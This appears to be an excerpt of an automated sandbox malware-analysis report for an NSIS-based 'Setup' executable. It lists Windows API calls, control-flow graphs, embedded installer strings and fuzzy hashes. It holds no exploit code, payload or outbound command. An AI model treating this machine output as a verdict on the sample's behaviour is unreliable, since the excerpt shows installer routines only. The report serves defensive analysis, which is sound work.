                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                              • String ID: jF
                                                                                                                                                                              • API String ID: 2295610775-3349280890
                                                                                                                                                                              • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                              • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                              • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                              • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 310444273-0
                                                                                                                                                                              • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                              • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                              • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                              • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                              Strings
                                                                                                                                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                              • Rename: %s, xrefs: 004018F8
                                                                                                                                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                              • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                              • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                              • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                              • Jump: %d, xrefs: 00401602
                                                                                                                                                                              • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                              • Call: %d, xrefs: 0040165A
                                                                                                                                                                              • BringToFront, xrefs: 004016BD
                                                                                                                                                                              • detailprint: %s, xrefs: 00401679
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                              • API String ID: 2872004960-3619442763
                                                                                                                                                                              • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                              • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                              • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                              • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                              • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                              • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3282139019-0
                                                                                                                                                                              • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                              • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                              • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                              • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                              • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                              • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                              • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                              • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                              • API String ID: 608394941-2746725676
                                                                                                                                                                              • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                              • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                              • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                              • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,HandbookFirmware,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,HandbookFirmware,HandbookFirmware,00000000,00000000,HandbookFirmware,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D76,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                              • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$HandbookFirmware
                                                                                                                                                                              • API String ID: 4286501637-590510232
